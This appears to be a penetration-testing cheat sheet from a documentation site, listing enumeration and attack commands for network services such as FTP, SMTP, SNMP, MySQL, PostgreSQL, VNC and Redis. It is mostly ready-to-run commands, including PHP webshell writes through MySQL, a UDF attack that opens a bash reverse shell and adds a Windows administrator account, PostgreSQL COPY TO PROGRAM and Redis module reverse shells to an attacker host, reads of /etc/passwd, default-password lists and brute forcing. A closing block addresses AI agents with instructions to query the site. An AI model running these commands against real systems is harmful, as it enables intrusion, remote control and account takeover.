# Ports

### FTP - 21

```bash
# All FTP Nmap Scripts
nmap -p21 --script ftp-* 10.10.10.100

# Anonymous login (username: anonymous)
ftp 10.10.10.100

# Using FTP
ftp> get file.txt
ftp> mget *.txt

# Using wget
wget -m --no-passive ftp://anonymous:anonymous@<target>/
wget -r ftp://USER:PASS@IP:PORT

# Using FTP
ftp> put local.txt
ftp> mput *.txt

# Using cURL
curl -T local.txt ftp://user:pass@<target>/
```

### SMTP - 25

```bash
# Connect to port 25 to start the mail transaction
nc -nvv 10.10.10.100 25
HELO foo

# A VRFY request asks the server to verify an email address
telnet 10.10.10.100 25
VRFY root

# Username guessing using VRFY with a custom wordlist generated by username-anarchy
# Eg wordlists: /usr/share/wordlists/metasploit/namelist.txt
./username-anarchy --input-file /home/user/Documents/users.txt > names.txt
smtp-user-enum -M VRFY -U /usr/share/SecLists/Usernames/Names/names.txt -t 10.10.10.100

# Send mail 
swaks -t mailadmin@localhost --from jonas@localhost --attach @file.odt --server 10.10.10.100 --body “Please check this spreadsheet” --header “Subject: Please check this spreadsheet”
```

### POP3 - 110,995

```bash
# Connect VIA
nc -nv <target> 110
USER username
PASS password

openssl s_client -connect <target>:995
```

```bash
# Commands Available
POP commands:
USER uid           Log in as "uid"
PASS password      Substitue "password" for your actual password
STAT               List number of messages, total mailbox size
LIST               List messages and sizes
RETR n             Show message n
DELE n             Mark message n for deletion
RSET               Undo any changes
QUIT               Logout (expunges messages if no RSET)
TOP msg n          Show first n lines of message number msg
CAPA               Get capabilities
```

### RPCBind - 111

```bash
rpcinfo -p 10.10.10.100
rpcclient -U "" 10.10.10.100
```

### IMAP - 143,993

```bash
# Connect Methods
telnet 10.10.10.100 143
openssl s_client -connect 10.10.10.100:993

# Authenticate
a1 LOGIN <username> <password>

# List folders
a2 LIST "" "*"

# Select the inbox                      
a3 SELECT INBOX

# Fetch the full body of message 1                 
a4 FETCH 1 BODY[]
       
a5 LOGOUT
```

### SNMP - 169

```bash
# Walks the entire SNMP tree and gets all possible information
snmpwalk -c public -v1 -t 10 10.10.10.100
# Gets Windows User Accounts
snmpwalk -c public -v1 10.10.10.100 1.3.6.1.4.1.77.1.2.25
# Gets Running Processes
snmpwalk -c public -v1 10.10.10.100 1.3.6.1.2.1.25.4.2.1.2
# Gets Installed Software
snmpwalk -c public -v1 10.10.10.100 1.3.6.1.2.1.25.6.3.1.2
# Gets TCP Connections (Remote Addresses / Ports)
snmpwalk -c public -v1 10.10.10.100 1.3.6.1.2.1.6.13.1.3
# Find the SNMP community string
hydra -P /usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://<IP>
# See custom shell scripts or commands
snmpwalk -v2c -c public 10.10.10.100 1.3.6.1.4.1.8072.1.3.2
```

### NFS - 2049 (TCP/UDP)

```bash
showmount -e 10.10.10.100
mount -t nfs 10.10.10.100:/ /tmp/nfs-dir –o nolock
```

### MYSQL - 3306

{% hint style="info" icon="triangle-exclamation" %}
Running **mysql** in the command line needs a TTY shell to provide output.
{% endhint %}

```bash
# Login and provide password
mysql -h 10.10.10.100 -u root -p

# Login without password
mysql -h 10.10.10.100 -u root

# Connect to specific DB
mysql -u username -p database_name

# Connect and execute query
mysql -u username -p -e "SELECT @@version;"

# Check if UPDATE TABLES permission is available
UPDATE users SET password='<HASH>' WHERE user_id='admin';

# Write to files
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'C:/wamp/www/shell.php';
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'
# SQL Injection -> ' UNION SELECT '<?php echo system($_GET["cmd"]);' INTO OUTFILE '/var/www/cmd.php'; --

# UDF Attacks
# Library File link - https://www.exploit-db.com/exploits/1518
# LINUX:
use mysql;
create table npn(line blob);
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so')); #You might need to change the path and file name
show variables like '%plugin%'; #  Get the plugin_dir path
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

# WINDOWS:
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```

### POSTGRES - 5432

```bash
# Connect 
psql -h 10.10.10.100 -U postgres -W

# Default creds
postgres : postgres
postgres : password
postgres : admin
admin : admin
admin : password

# Version Enumeration
SELECT version();

\l # List DBs
\du # List all users
\du+ # List current user permissions

# Get User privileges
SELECT usename, usecreatedb, usesuper FROM pg_user;

# Get Superusers
SELECT usename FROM pg_user WHERE usesuper = true;

# Read Files with COPY FROM
CREATE TABLE temp_table(content text);
COPY temp_table FROM '/etc/passwd';
SELECT * FROM temp_table;
DROP TABLE temp_table;

# Write Files with COPY TO
COPY (SELECT 'malicious content') TO '/tmp/note.txt';

# Execute Commands via COPY PROGRAM
COPY (SELECT '') TO PROGRAM 'id > output.txt';
COPY (SELECT '') TO PROGRAM 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1';
COPY (SELECT '') TO PROGRAM '/bin/bash -c "bash -i >& /dev/tcp/<ip>/80 0>&1"';

# Read files via pg_* commands
SELECT pg_read_file('/etc/passwd');
SELECT pg_ls_dir('/var/www/html');
```

More info: <https://hackviser.com/tactics/pentesting/services/postgresql#pg_read_file-exploitation>

### VNC - 5900s

```bash
# Basic connection
vncviewer target.com:5900

# With display number (5900 + display)
vncviewer target.com:0  # Port 5900
vncviewer target.com:1  # Port 5901

# With password file
vncviewer -passwd ~/.vnc/passwd target.com:0

# Windows
tvnviewer.exe target.com::5900

# Linux
vncviewer target.com:5900
```

```bash
# Common VNC passwords
password
12345678
vnc123
admin
administrator
```

More info: <https://hackviser.com/tactics/pentesting/services/vnc>

### Redis - 6379

```bash
# gather version and service information.
nc -nv <IP> 6379

# Authentication and common credentials to try:
# admin:admin
# administrator:administrator
# root:root
# user:user
# test:test
# redis:redis
redis-cli -h <IP> --user <username> -a <password>

# Common REDIS commands
GET <KEY_NAME>
KEYS *
CONFIG GET *
INFO
CLIENT LIST
MODULE LOAD /path/to/module.so

# Load module and execute custom commands (Compile malicious module with system() function)
redis-cli -h <IP>
> MODULE LOAD /path/to/evil.so # Assumes .so file is already inside the target machine
> evil.exec "whoami"
> evil.exec "bash -i >& /dev/tcp/attacker-ip/4444 0>&1"

# Redis RCE for Redix 4.x / 5.x / <= 5.0.9
# 1. Usage: python redis-rce.py -r <RHOST> -p <REDIS_PORT> -L <LHOST> -P <LPORT> -f exp_lin.so 
https://github.com/Ridter/redis-rce -> Get the script from here
https://github.com/jas502n/Redis-RCE -> Get the compiled .so from here

# 2. Similar to above but you can compile the .so file here
https://github.com/n0b0dyCN/redis-rogue-server -> Compile and run the script
```

More info: <https://hackviser.com/tactics/pentesting/services/redis#connect>

### References

1. <https://edu.noirchapeau.com/footprinting-enumeration-and-information-gathering-notes/ftp-pentesting-notes#basic-information>
2. <https://hackviser.com/tactics/pentesting/services/postgresql#connect>
3. <https://x7331.gitbook.io/boxes/services/tcp>
4. <https://hackviser.com/tactics/pentesting>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/enumeration/ports.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.